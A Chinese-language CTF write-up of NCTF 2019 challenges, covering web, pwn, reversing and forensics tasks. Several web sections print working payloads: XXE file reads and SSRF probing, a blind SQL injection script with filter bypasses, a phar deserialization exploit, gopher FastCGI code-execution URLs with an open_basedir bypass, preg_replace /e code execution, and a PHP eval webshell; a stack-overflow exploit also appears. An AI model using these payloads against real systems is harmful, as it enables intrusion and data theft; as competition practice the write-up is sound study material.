NCTF 游记

0x00 前言

又是一场被大佬出的“入门新手基础水题”虐爆的比赛。。。。。。。

pwn2和流量分析做的心态爆炸。。。。导致正常比赛下来都没做出啥题(其实是菜。。。。。。

最终盗版战队止步前十。。。。天璇的其他大佬都好强啊!(群除我佬。。。。)

收货:

  • XEE攻击基本方法
  • linux 系统中一些敏感文件及其作用
  • 利用PIL写绘图脚本
  • chr().拼接字符串绕过引号限制
  • Wireshark 基本过滤操作的语法
  • SSRF 攻击

Todo:

  • XXS 攻击的具体操作和原理
  • PIE 保护情况下基址的泄露方法和64位按字节写入的操作。。。。。。。。
  • 一堆pwn的知识点 rop heap........
  • Crypto密码学相关知识 RSA AES.......
  • 逆向patch.....

0x01 Fake XML cookbook

F12看了一眼发现

function doLogin(){
    var username = $("#username").val();
    var password = $("#password").val();
    if(username == "" || password == ""){
        alert("Please enter the username and password!");
        return;
    }

    var data = "<user><username>" + username + "</username><password>" + password + "</password></user>"; 
    $.ajax({
        type: "POST",
        url: "doLogin.php",
        contentType: "application/xml;charset=utf-8",
        data: data,
        dataType: "xml",
        anysc: false,
        success: function (result) {
            var code = result.getElementsByTagName("code")[0].childNodes[0].nodeValue;
            var msg = result.getElementsByTagName("msg")[0].childNodes[0].nodeValue;
            if(code == "0"){
                $(".msg").text(msg + " login fail!");
            }else if(code == "1"){
                $(".msg").text(msg + " login success!");
            }else{
                $(".msg").text("error:" + msg);
            }
        },
        error: function (XMLHttpRequest,textStatus,errorThrown) {
            $(".msg").text(errorThrown + ':' + textStatus);
        }
    }); 
}

用XML和服务器通讯,联想到XXE攻击

burp抓post包得到

POST /doLogin.php HTTP/1.1
Host: nctf2019.x1ct34m.com:40002
Content-Length: 207
Accept: application/xml, text/xml, */*; q=0.01
Origin: http://nctf2019.x1ct34m.com:40002
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36
DNT: 1
Content-Type: application/xml;charset=UTF-8
Referer: http://nctf2019.x1ct34m.com:40003/
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en-US;q=0.8,en;q=0.7
Connection: close

<user><username>admin</username><password>123</password></user>

根据js脚本可以发现username是可以回显的

然后构造一下exp

POST /doLogin.php HTTP/1.1
Host: nctf2019.x1ct34m.com:40002
Content-Length: 207
Accept: application/xml, text/xml, */*; q=0.01
Origin: http://nctf2019.x1ct34m.com:40002
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36
DNT: 1
Content-Type: application/xml;charset=UTF-8
Referer: http://nctf2019.x1ct34m.com:40003/
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en-US;q=0.8,en;q=0.7
Connection: close

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE foo [
 <!ENTITY xxe SYSTEM "php://filter/read=convert.base64-encode/resource=/flag">
 ]>

<user><username>&xxe;</username><password>123</password></user>

0x02 True XML cookbook

相当于第一题的加强版本

现在/flag里东西没了

看题目描述一开始以为要用上phar之类的骚操作,但是没有其他上传点了

fuzz读了一下 /var/www/html/doLogin.php

倒是有admin的密码了。。。

但是没啥用

读了/bin/sh 居然是有的。。。。

再读了读/etc/hosts 和/proc/net/arp

内网ip泄露

127.0.0.1    localhost
::1    localhost ip6-localhost ip6-loopback
fe00::0    ip6-localnet
ff00::0    ip6-mcastprefix
ff02::1    ip6-allnodes
ff02::2    ip6-allrouters
172.18.0.2    3b6bacb4719b
IP address       HW type     Flags       HW address            Mask     Device
192.168.1.40     0x1         0x0         00:00:00:00:00:00     *        eth0
192.168.1.75     0x1         0x0         00:00:00:00:00:00     *        eth0
192.168.1.55     0x1         0x0         00:00:00:00:00:00     *        eth0
192.168.1.16     0x1         0x0         00:00:00:00:00:00     *        eth0
192.168.1.63     0x1         0x0         00:00:00:00:00:00     *        eth0
192.168.1.249    0x1         0x0         00:00:00:00:00:00     *        eth0
192.168.1.24     0x1         0x0         00:00:00:00:00:00     *        eth0
192.168.1.39     0x1         0x0         00:00:00:00:00:00     *        eth0
192.168.1.70     0x1         0x0         00:00:00:00:00:00     *        eth0
192.168.1.47     0x1         0x0         00:00:00:00:00:00     *        eth0
192.168.1.8      0x1         0x2         02:42:c0:a8:01:08     *        eth0
192.168.1.244    0x1         0x0         00:00:00:00:00:00     *        eth0
192.168.1.23     0x1         0x0         00:00:00:00:00:00     *        eth0
192.168.1.50     0x1         0x0         00:00:00:00:00:00     *        eth0
192.168.1.252    0x1         0x0         00:00:00:00:00:00     *        eth0
192.168.1.31     0x1         0x0         00:00:00:00:00:00     *        eth0
192.168.1.58     0x1         0x0         00:00:00:00:00:00     *        eth0
192.168.1.69     0x1         0x0         00:00:00:00:00:00     *        eth0
192.168.1.7      0x1         0x0         00:00:00:00:00:00     *        eth0
192.168.1.34     0x1         0x0         00:00:00:00:00:00     *        eth0
192.168.1.77     0x1         0x0         00:00:00:00:00:00     *        eth0
192.168.1.15     0x1         0x0         00:00:00:00:00:00     *        eth0
192.168.1.42     0x1         0x0         00:00:00:00:00:00     *        eth0
192.168.1.49     0x1         0x0         00:00:00:00:00:00     *        eth0
192.168.1.243    0x1         0x0         00:00:00:00:00:00     *        eth0
192.168.1.18     0x1         0x0         00:00:00:00:00:00     *        eth0
192.168.1.57     0x1         0x0         00:00:00:00:00:00     *        eth0
192.168.1.251    0x1         0x0         00:00:00:00:00:00     *        eth0
192.168.1.26     0x1         0x0         00:00:00:00:00:00     *        eth0
192.168.1.33     0x1         0x0         00:00:00:00:00:00     *        eth0
192.168.1.64     0x1         0x0         00:00:00:00:00:00     *        eth0
192.168.1.2      0x1         0x0         00:00:00:00:00:00     *        eth0
192.168.1.41     0x1         0x0         00:00:00:00:00:00     *        eth0
192.168.1.72     0x1         0x0         00:00:00:00:00:00     *        eth0
192.168.1.10     0x1         0x0         00:00:00:00:00:00     *        eth0
192.168.1.52     0x1         0x0         00:00:00:00:00:00     *        eth0
192.168.1.246    0x1         0x0         00:00:00:00:00:00     *        eth0
192.168.1.17     0x1         0x0         00:00:00:00:00:00     *        eth0
192.168.1.60     0x1         0x0         00:00:00:00:00:00     *        eth0
192.168.1.254    0x1         0x0         00:00:00:00:00:00     *        eth0
192.168.1.25     0x1         0x0         00:00:00:00:00:00     *        eth0
192.168.1.36     0x1         0x0         00:00:00:00:00:00     *        eth0
192.168.1.71     0x1         0x0         00:00:00:00:00:00     *        eth0
192.168.1.1      0x1         0x2         02:42:ea:57:7a:1c     *        eth0
192.168.1.44     0x1         0x0         00:00:00:00:00:00     *        eth0
192.168.1.9      0x1         0x0         00:00:00:00:00:00     *        eth0
192.168.1.245    0x1         0x0         00:00:00:00:00:00     *        eth0
192.168.1.20     0x1         0x0         00:00:00:00:00:00     *        eth0
192.168.1.51     0x1         0x0         00:00:00:00:00:00     *        eth0
192.168.1.253    0x1         0x0         00:00:00:00:00:00     *        eth0
192.168.1.28     0x1         0x0         00:00:00:00:00:00     *        eth0
192.168.1.59     0x1         0x0         00:00:00:00:00:00     *        eth0
192.168.1.4      0x1         0x0         00:00:00:00:00:00     *        eth0
192.168.1.35     0x1         0x0         00:00:00:00:00:00     *        eth0
192.168.1.66     0x1         0x0         00:00:00:00:00:00     *        eth0
192.168.1.12     0x1         0x0         00:00:00:00:00:00     *        eth0
192.168.1.43     0x1         0x0         00:00:00:00:00:00     *        eth0
192.168.1.74     0x1         0x0         00:00:00:00:00:00     *        eth0
192.168.1.54     0x1         0x0         00:00:00:00:00:00     *        eth0
192.168.1.19     0x1         0x0         00:00:00:00:00:00     *        eth0
192.168.1.62     0x1         0x0         00:00:00:00:00:00     *        eth0
192.168.1.248    0x1         0x0         00:00:00:00:00:00     *        eth0
192.168.1.27     0x1         0x0         00:00:00:00:00:00     *        eth0
192.168.1.38     0x1         0x0         00:00:00:00:00:00     *        eth0
192.168.1.65     0x1         0x0         00:00:00:00:00:00     *        eth0
192.168.1.3      0x1         0x0         00:00:00:00:00:00     *        eth0
192.168.1.46     0x1         0x0         00:00:00:00:00:00     *        eth0
192.168.1.73     0x1         0x0         00:00:00:00:00:00     *        eth0
192.168.1.11     0x1         0x0         00:00:00:00:00:00     *        eth0
192.168.1.53     0x1         0x0         00:00:00:00:00:00     *        eth0
192.168.1.247    0x1         0x0         00:00:00:00:00:00     *        eth0
192.168.1.22     0x1         0x0         00:00:00:00:00:00     *        eth0
192.168.1.61     0x1         0x0         00:00:00:00:00:00     *        eth0
192.168.1.30     0x1         0x0         00:00:00:00:00:00     *        eth0
192.168.1.37     0x1         0x0         00:00:00:00:00:00     *        eth0
192.168.1.68     0x1         0x0         00:00:00:00:00:00     *        eth0
192.168.1.6      0x1         0x0         00:00:00:00:00:00     *        eth0
192.168.1.45     0x1         0x0         00:00:00:00:00:00     *        eth0
192.168.1.76     0x1         0x0         00:00:00:00:00:00     *        eth0
192.168.1.14     0x1         0x0         00:00:00:00:00:00     *        eth0
192.168.1.21     0x1         0x0         00:00:00:00:00:00     *        eth0
192.168.1.48     0x1         0x0         00:00:00:00:00:00     *        eth0
192.168.1.242    0x1         0x0         00:00:00:00:00:00     *        eth0
192.168.1.29     0x1         0x0         00:00:00:00:00:00     *        eth0
192.168.1.56     0x1         0x0         00:00:00:00:00:00     *        eth0
192.168.1.250    0x1         0x0         00:00:00:00:00:00     *        eth0
192.168.1.5      0x1         0x0         00:00:00:00:00:00     *        eth0
192.168.1.32     0x1         0x0         00:00:00:00:00:00     *        eth0
192.168.1.67     0x1         0x0         00:00:00:00:00:00     *        eth0
192.168.1.13     0x1         0x0         00:00:00:00:00:00     *        eth0

SSRF Burp Suite Introuder 爆破

192.168.1.8出了flag.....

POST /doLogin.php HTTP/1.1
Host: nctf2019.x1ct34m.com:40003
Content-Length: 220
Accept: application/xml, text/xml, */*; q=0.01
Origin: http://nctf2019.x1ct34m.com:40003
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36
DNT: 1
Content-Type: application/xml;charset=UTF-8
Referer: http://nctf2019.x1ct34m.com:40003/
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en-US;q=0.8,en;q=0.7
Connection: close

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE foo [
 <!ENTITY xxe SYSTEM "php://filter/read=convert.base64-encode/resource=http://192.168.1.8">
 ]>

<user><username>&xxe;</username><password>123</password></user>

0x03 SQLi (赛后复现)

直接给了sql语句

select * from users where username='' and passwd=''

但是过滤了一堆select . or ' like基本都过滤了

然后这里的bypass技巧是

单引号可以使用\来转义绕过,or可以采用|| =可以采用regexp,#可以用`\x00替代

然后基本上么得跨表查询,就只能盲注爆破password了

exp 核心代码部分

def boolequ(start,end):
    ret=""
    for i in range(start,end):
        for ch in pt:
            payload="""||passwd/**/REGEXP/**/"^{}";\x00""".format(ret+ch)
            data = {
                "username":'\\',
                "passwd":payload
            }
            #print data
            req=requests.post(url,data=data,allow_redirects=False)
            if req.status_code!=200 and req.status_code!=302:
                continue 
            if req.status_code==302:
                ret=ret+ch
                sys.stdout.write("[-]Result : -> {0} <-\r".format(ret))
                sys.stdout.flush()
                break
    print("[+]Result : ->"+ret+"<-")

0x04 phar matches everything (赛后复现)

...原题可以拿到源码,但似乎buuoj上不行

能拿到的源码是cathmine.php

<?php
class Easytest{
    protected $test;
    public function funny_get(){
        return $this->test;
    }
}
class Main {
    public $url;
    public function curl($url){
        $ch = curl_init();  
        curl_setopt($ch,CURLOPT_URL,$url);
        curl_setopt($ch,CURLOPT_RETURNTRANSFER,true);
        $output=curl_exec($ch);
        curl_close($ch);
        return $output;
    }

    public function __destruct(){
        $this_is_a_easy_test=unserialize($_GET['careful']);
        if($this_is_a_easy_test->funny_get() === '1'){
            echo $this->curl($this->url);
        }
    }    
}

if(isset($_POST["submit"])) {
    $check = getimagesize($_POST['name']);
    if($check !== false) {
        echo "File is an image - " . $check["mime"] . ".";
    } else {
        echo "File is not an image.";
    }
}
?>

这里藏了一个ssrf 但是不能直接用这个php打,因为url不可控

判断文件类型使用了getimageinfo,所以可以搞phar的反序列化,这里很明显要我们SSRF,首先读下file:///proc/net/arp

Exp

<?php
class Easytest{
    protected $test='1';
    public function funny_get(){
        return $this->test;
    }
}
class Main {
    public $url;
}


$test = new EasyTest;
echo urlencode(serialize($test))."\n";

$payload = new Main;
$payload->url = "file:///proc/net/arp";

$png_header = hex2bin('89504e470d0a1a0a0000000d49484452000000400000004000');
$phar = new Phar('exp.phar');
$phar -> startBuffering();
$phar -> setStub($png_header.'<?php __HALT_COMPILER();?>');   //设置 stub,增加 gif 文件头
$phar -> addFromString('test.txt','test');  //添加要压缩的文件
$phar -> setMetadata($payload);  //将自定义 meta-data 存入 manifest
$phar -> stopBuffering();
rename("exp.phar","exp.png");

?>

拿到

IP address       HW type     Flags       HW address            Mask     Device
173.236.149.2    0x1         0x2         02:42:ad:ec:95:02     *        eth0

/etc/host 拿到

127.0.0.1    localhost
::1    localhost ip6-localhost ip6-loopback
fe00::0    ip6-localnet
ff00::0    ip6-mcastprefix
ff02::1    ip6-allnodes
ff02::2    ip6-allrouters
173.236.149.9    osrc

但是都么得回显,后来发现是173.236.149.10这个(估计是buuoj的镜像问题

然后访问一下显示

这里用evoa师傅的脚本打

python gopher.srff.exp.py -c "<?php phpinfo();?>" 173.236.149.10 /var/www/html/index.php
gopher://127.0.0.1:9000/_%01%01%005%00%08%00%00%00%01%00%00%00%00%00%00%01%04%005%01%DB%00%00%0E%02CONTENT_LENGTH18%0C%10CONTENT_TYPEapplication/text%0B%04REMOTE_PORT9985%0B%09SERVER_NAMElocalhost%11%0BGATEWAY_INTERFACEFastCGI/1.0%0F%0ESERVER_SOFTWAREphp/fcgiclient%0B%09REMOTE_ADDR127.0.0.1%0F%17SCRIPT_FILENAME/var/www/html/index.php%0B%17SCRIPT_NAME/var/www/html/index.php%09%1FPHP_VALUEauto_prepend_file%20%3D%20php%3A//input%0E%04REQUEST_METHODPOST%0B%02SERVER_PORT80%0F%08SERVER_PROTOCOLHTTP/1.1%0C%00QUERY_STRING%0F%16PHP_ADMIN_VALUEallow_url_include%20%3D%20On%0D%01DOCUMENT_ROOT/%0B%09SERVER_ADDR127.0.0.1%0B%17REQUEST_URI/var/www/html/index.php%01%04%005%00%00%00%00%01%05%005%00%12%00%00%3C%3Fphp%20phpinfo%28%29%3B%3F%3E%01%05%005%00%00%00%00

替换成

gopher://173.236.149.10:9000/_%01%01%005%00%08%00%00%00%01%00%00%00%00%00%00%01%04%005%01%DB%00%00%0E%02CONTENT_LENGTH18%0C%10CONTENT_TYPEapplication/text%0B%04REMOTE_PORT9985%0B%09SERVER_NAMElocalhost%11%0BGATEWAY_INTERFACEFastCGI/1.0%0F%0ESERVER_SOFTWAREphp/fcgiclient%0B%09REMOTE_ADDR127.0.0.1%0F%17SCRIPT_FILENAME/var/www/html/index.php%0B%17SCRIPT_NAME/var/www/html/index.php%09%1FPHP_VALUEauto_prepend_file%20%3D%20php%3A//input%0E%04REQUEST_METHODPOST%0B%02SERVER_PORT80%0F%08SERVER_PROTOCOLHTTP/1.1%0C%00QUERY_STRING%0F%16PHP_ADMIN_VALUEallow_url_include%20%3D%20On%0D%01DOCUMENT_ROOT/%0B%09SERVER_ADDR127.0.0.1%0B%17REQUEST_URI/var/www/html/index.php%01%04%005%00%00%00%00%01%05%005%00%12%00%00%3C%3Fphp%20phpinfo%28%29%3B%3F%3E%01%05%005%00%00%00%00

可以看到有open_basedir /var/www/html:/tmp

用一个经典的绕过方式

mkdir('eki');chdir('eki');ini_set('open_basedir','..');chdir('..');chdir('..');chdir('..');chdir('..');ini_set('open_basedir','/');echo(file_get_contents('flag'));
python gopher.srff.exp.py -c "<?php mkdir('eki');chdir('eki');ini_set('open_basedir','..');chdir('..');chdir('..');chdir('..');chdir('..');ini_set('open_basedir','/');echo(file_get_contents('flag'));?>" 173.236.149.10 /var/www/html/index.php

gopher://127.0.0.1:9000/_%01%01z%BF%00%08%00%00%00%01%00%00%00%00%00%00%01%04z%BF%01%DC%00%00%0E%03CONTENT_LENGTH171%0C%10CONTENT_TYPEapplication/text%0B%04REMOTE_PORT9985%0B%09SERVER_NAMElocalhost%11%0BGATEWAY_INTERFACEFastCGI/1.0%0F%0ESERVER_SOFTWAREphp/fcgiclient%0B%09REMOTE_ADDR127.0.0.1%0F%17SCRIPT_FILENAME/var/www/html/index.php%0B%17SCRIPT_NAME/var/www/html/index.php%09%1FPHP_VALUEauto_prepend_file%20%3D%20php%3A//input%0E%04REQUEST_METHODPOST%0B%02SERVER_PORT80%0F%08SERVER_PROTOCOLHTTP/1.1%0C%00QUERY_STRING%0F%16PHP_ADMIN_VALUEallow_url_include%20%3D%20On%0D%01DOCUMENT_ROOT/%0B%09SERVER_ADDR127.0.0.1%0B%17REQUEST_URI/var/www/html/index.php%01%04z%BF%00%00%00%00%01%05z%BF%00%AB%00%00%3C%3Fphp%20mkdir%28%27eki%27%29%3Bchdir%28%27eki%27%29%3Bini_set%28%27open_basedir%27%2C%27..%27%29%3Bchdir%28%27..%27%29%3Bchdir%28%27..%27%29%3Bchdir%28%27..%27%29%3Bchdir%28%27..%27%29%3Bini_set%28%27open_basedir%27%2C%27/%27%29%3Becho%28file_get_contents%28%27flag%27%29%29%3B%3F%3E%01%05z%BF%00%00%00%00`

0x05 easyphp

大佬队友带我躺赢。。。。。

0x06 replace

填三个"#"报错

Parse error: syntax error, unexpected end of file in /var/www/html/index.php(70) : regexp code on line 1

Fatal error: preg_replace(): Failed evaluating code: # in /var/www/html/index.php on line 70

实现功能使用的是preg_match()

题目提示用了php5.6

想到preg_match() /e参数

试一下可以执行phpinfo()

POST /index.php HTTP/1.1
Host: nctf2019.x1ct34m.com:40006
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:70.0) Gecko/20100101 Firefox/70.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 72
Origin: http://nctf2019.x1ct34m.com:40006
Connection: close
Referer: http://nctf2019.x1ct34m.com:40006/index.php
Cookie: PHPSESSID=6vtpnnca8f9mjjde768sqiub4g
Upgrade-Insecure-Requests: 1

sub=text&pat=e&rep=phpinfo();

但是直接用readfile('/flag')读文件,发现单引号双引号被拦截

于是用chr()拼接表示字符串。。。。。

POST /index.php HTTP/1.1
Host: nctf2019.x1ct34m.com:40006
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:70.0) Gecko/20100101 Firefox/70.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 72
Origin: http://nctf2019.x1ct34m.com:40006
Connection: close
Referer: http://nctf2019.x1ct34m.com:40006/index.php
Cookie: PHPSESSID=6vtpnnca8f9mjjde768sqiub4g
Upgrade-Insecure-Requests: 1

sub=text&pat=e&rep=readfile(chr(47).chr(102).chr(108).chr(97).chr(103));

0x07 flask

大佬队员,躺赢。。。。。

0x08 Upload your Shell

翻了一下网页就只有

index.php?action=imgs.html

有注入点 然后想着上传一个图片马 直接写一句话改后缀名不行 看起来他是要读文件头的 并且拦截了<?(有时候正常的图片文件都会有。。。。。) 考虑php的第三种写法

<script language="php"> 
@eval($_POST[a]);
</script>

刚准备用菜刀的结果告诉我一个服务器上自带的图片马的地址 用自带的action参数解析成php就完事了 payload:

/index.php?action=/var/www/html/upload-imgs/321fab94ed3f1e1fba698ddda303566a/Th1s_is_a_fl4g.jpg

0x09 flask_website

大佬队友带我躺赢。。。。。

0x0A simple_xss

据队友说是个入门向xss

http://xsspt.com/生成一段xss 发给admin

过一会就会得到admin的cookie

然后就能拿到flag......

0x0B hacker_backdoor

大佬队友带我躺赢。。。。。+2

0x0C tsb

tsb->bst .....

0x0D 难看的代码

大佬队友带我躺赢。。。。。+3

0x0E 签到题

大佬队友带我躺赢。。。。。+4

0x0F DEBUG

真就IDA 动态调试。。。。。

因为

  for ( i = 0; i <= 23; ++i )
  {
    if ( v7[i] != *(&s + i) )
    {
      printf("GG");
      exit(0);
    }
  }

进循环时s就计算好了

然后下个断点直接看栈就好了

0x10 Our 16bit Games

大佬队友带我躺赢。。。。。+5

0x11 Easy Ternary

大佬队友带我躺赢。。。。。+6

0x12 你大概需要一个带bar的mac

无设备引起不适。。。

0x13 math_easy

math.....easy?...... 过.......

0x14 hello_pwn

nc 题。。。。。

#coding=utf-8
from pwn import *
io=remote("139.129.76.65","50003")
io.interactive()

0x15 pwn me 100 years! (I)

checksec 看一下

    Arch:     amd64-64-little
    RELRO:    Partial RELRO
    Stack:    No canary found
    NX:       NX enabled
    PIE:      No PIE (0x400000)

没开Canary和PIE,

要满足两个条件

直接栈溢出就完事了

#coding=utf-8
from pwn import *
payload="yes\x00"+'a'*(0x10-0x4)+p64(0x66666666)
io=remote("139.129.76.65","50004")
io.sendafter("ready?\n",payload)
io.interactive()

0x16 pwn me 100 years! (II)

漏洞:栈上变量未初始化导致第一个函数里的buf就是第二个函数的&dest

然后可以用第二个函数的printf格式化漏洞

但是checksec告诉我们

    Arch:     amd64-64-little
    RELRO:    Partial RELRO
    Stack:    Canary found
    NX:       NX enabled
    PIE:      PIE enabled

开了PIE....

还得泄露基址。。

最后没能整出来,还是要好好学。。。。。

0x17 ~ 0x1C(pwn)

0x17没做出来,心态爆炸。。。。。

0x1D Keyboard

九宫格输入法。。。。。。

好像把所有不一样的表示换成不同字幕跑quipquip也能过。。。。。

0x1E~0x21 (Crypto)

我,数学学术垃圾,过.......

0x22 a_good_idea

foremost+stegsolve(image Combiner)

得到一张二维码,扫描得到flag

0x23 Become a Rockstar

看文风有点奇怪。。。。像是编程语言。。。

搜了一下有没有诗歌一样的编程语言

发现Rockstar语言

用Rockstar-js 没跑出来暂时放弃了

结果Rockstar-py可以跑出来

Leonard_Adleman = "star"
Problem_Makers = 76
Problem_Makers = "NCTF{"
def God(World):
    a_boy = "flag"
    the_boy = 3
def Evil(your_mind):
    a_girl = "no flag"
    the_girl = 5
Truths = 3694
Bob = "ar"
Adi_Shamir = "rock"
def Love(Alice, Bob):
    Mallory = 13
    Mallory = 24
Everything = 114514
Alice = "you"
def Reality(God, Evil):
    God = 26
    Evil = 235
Ron_Rivest = "nice"
def You_Want_To(Alice, Love, Anything):
    You = 5.75428
your_heart = input()
You = 5
your_mind = input()
Nothing = 31
if Truths * Nothing == Everything:
    RSA = Ron_Rivest + Adi_Shamir + Leonard_Adleman
if Everything / Nothing == Truths:
    Problem_Makers = Problem_Makers + Alice + Bob
print(Problem_Makers)
the_flag = 245
the_confusion = 244
print(RSA)
Mysterious_One = "}"
print(Mysterious_One)
This = 4
This = 35
This = 7
This = 3
This = 3
This = 37

0x24 Bright Body I

虚幻引擎好游戏啊!(然而手残。。。。。

巅峰极客Nijia留下的心理阴影

以为要用逆向代码啥的

结果最后是在pak里直接strings就能出来的题目。。。。。

strings /mnt/c/Users/Eki/Desktop/Bright\ Body\ I/Bright\ Body\ I/Magic/Content/Paks/Magic-WindowsNoEditor.pak |grep NCTF*

0x25 有内鬼,终止交易

一个ss协议流量分析题

  一、针对wireshark最常用的自然是针对IP地址的过滤。其中有几种情况:

   表达式为:ip.src == 192.168.0.1

  (2)对目的地址为192.168.0.1的包的过滤,即抓取目的地址满足要求的包。

   表达式为:ip.dst == 192.168.0.1

  (3)对源或者目的地址为192.168.0.1的包的过滤,即抓取满足源或者目的地址的ip地址是192.168.0.1的包。

   表达式为:ip.addr == 192.168.0.1,或者 ip.src == 192.168.0.1 or ip.dst == 192.168.0.1

  (4)要排除以上的数据包,我们只需要将其用括号囊括,然后使用 "!" 即可。

   表达式为:!(表达式)

  二、针对协议的过滤

  (1)仅仅需要捕获某种协议的数据包,表达式很简单仅仅需要把协议的名字输入即可。

​ 表达式为:http

  (2)需要捕获多种协议的数据包,也只需对协议进行逻辑组合即可。

   表达式为:http or telnet (多种协议加上逻辑符号的组合即可)

  (3)排除某种协议的数据包

   表达式为:not arp !tcp

  三、针对端口的过滤(视协议而定)

  (1)捕获某一端口的数据包

   表达式为:tcp.port == 80

  (2)捕获多端口的数据包,可以使用and来连接,下面是捕获高端口的表达式

   表达式为:udp.port >= 2048

  四、针对长度和内容的过滤

  (1)针对长度的过虑(这里的长度指定的是数据段的长度)

   表达式为:udp.length < 30 http.content_length <=20

  (2)针对数据包内容的过滤

     表达式为:http.request.uri matches "vipscu" (匹配http请求中含有vipscu字段的请求信息)

config.json泄露了加密方法、密钥和主机地址

用ss的源码里的脚本直接跑解密

人肉分析了半个下午,心态爆炸。。。。。

分析不出来,

由于客户端和服务端发送包都经过了加密,不能整个导出进行解密,需分开解密

......

最后找到是在这个TCP包里。。。

0x26 小狗的秘密

流量分析套路题

用Wireshark导出HTTP对象

最大的一个1.html里有很奇妙的东西类似

(255, 255, 255) (255, 255, 255) (255, 255, 255) (255, 255, 255) (255, 255, 255) (255, 255, 255) (255, 255, 255) (255, 255, 255) (255, 255, 255) (255, 255, 255) (255, 255, 255) (255, 255, 255) (255, 255, 255) (255, 255, 255) (255, 255, 255) (255, 255, 255) (255, 255, 255) (255, 255, 255) (255, 255, 255) (255, 255, 255) (255, 255, 255) (255, 255, 255) (255, 255, 255) (255, 255, 255) (255, 255, 255) (255, 255, 255) (255, 255, 255) (255, 255, 255) (255, 255, 255) (255, 255, 255) (255, 255, 255) (255, 255, 255) (255, 255, 255) (255, 255, 255) (255, 255, 255) (255, 255, 255) (255, 255, 255) (255, 255, 255) (255, 255, 255) (255, 255, 255) (255, 255, 255) (255, 255, 255) (255, 255, 255) (255, 255, 255) (255, 255, 255) (255, 255, 255) (255, 255, 255) (255, 255, 255) (255, 255, 255) (255, 255, 255) (255, 255, 255) (255, 255, 255) (255, 255, 255) (255, 255, 255) (255, 255, 255) (255, 255, 255) (255, 255, 255) (255, 255, 255) (255, 255, 255) (255, 255, 255) (255, 255, 255) (255, 255, 255) (255, 255, 255) (255, 255, 255) (255, 255, 255) (255, 255, 255) (255, 255, 255) (255, 255, 255) (255, 255, 255) (255, 255, 255) (255, 255, 255) (255, 255, 255) (255, 255, 255) (255, 255, 255) (255, 255, 255) (255, 255, 255) (255, 255, 255) (255, 255, 255) (255, 255, 255) (255, 255, 255) (255, 255, 255) (255, 255, 255) (255, 255, 255) (255, 255, 255) (255, 255, 255) (255, 255, 255) (255, 255, 255) (255, 255, 255) (255, 255, 255).....

盲猜是RGB像素点,把格式改一下用下面的脚本导出图像

#coding=utf-8
from PIL import Image

x = 500    #x坐标  通过对txt里的行数进行整数分
y = 100    #y坐标  x * y = 行数

im = Image.new("RGB", (x, y))
file = open('1.html')

for i in range(0, x):
    for j in range(0, y):
        line = file.readline()  #获取一行的rgb值
        rgb = line.split(", ")  #分离rgb,文本中逗号后面有空格
        im.putpixel((i, j), (int(rgb[0]), int(rgb[1]), int(rgb[2])))

im.save('flag.jpg')

0x27 键盘侠

下载一个zip伪加密

里面一张大的不科学的图

直接上foremost

得到一个docx

说是隐藏字符

打开docx隐藏字符显示

得到这么一串东西

PD4~idqQC|WjHloX>)UPb8~ZFb8laGczAeteE

想了很久。。

甚至打开xml发现密文分三段。。。还有个hint:eastAsia

以为是某种多表代换?

最后也没做出来

结果最后告诉我是个base85..........

python3
>>> import base64
>>> base64.b85decode('PD4~idqQC|WjHloX>)UPb8~ZFb8laGczAeteE')
b'NCTF{Ba3e85_issssss_so_xxxxx}'

0x28 What's this

WireShark找到大文件点导出字节流存储为zip

发现还是个伪加密

里面一堆base64

多行的解不出来,应该就是base64隐写了

跑一下脚本就得到flag....

(一开始可能复制错了结果没跑出来。。。。。)

0x29 2077

点开一看发现是2077的“官方”解密视频

应该会有大佬解过

所以Google Cyberpunk 2077 stream decode.

然后找到一个帖子 https://www.reddit.com/r/pcgaming/comments/9an6mn/cd_projekt_red_twitch_live_with_cyberpunk_2077/ ,解密结果是一张图

下载后用 sha256sum 命令求 sha256 值即可。

0x2A pip install

直接把pip 下下来的包拿来分析

里面有一串神奇的编码。。。。

tmp_file = tempfile.gettempdir() + path.sep + '.f14g_is_here'
f = open(tmp_file, 'w')
f.write('TkNURntjNHJlZnVsX2FiMHU3X2V2MWxfcGlwX3A0Y2thZ2V9')
f.close()

用base64就能解码出来

© Eki's CTF-notes 2019-2020 CC-by-nc-sa 4.0。 all right reserved,powered by Gitbook本网站最后修订于: 2020-07-02 20:09:49

results matching ""

    No results matching ""